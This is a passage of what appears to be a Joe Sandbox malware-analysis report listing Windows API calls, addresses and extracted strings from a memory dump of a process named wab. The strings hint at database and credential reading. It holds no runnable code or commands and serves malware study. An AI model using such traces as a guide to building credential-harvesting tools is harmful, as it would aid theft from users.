                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 59245283-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3467550082-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
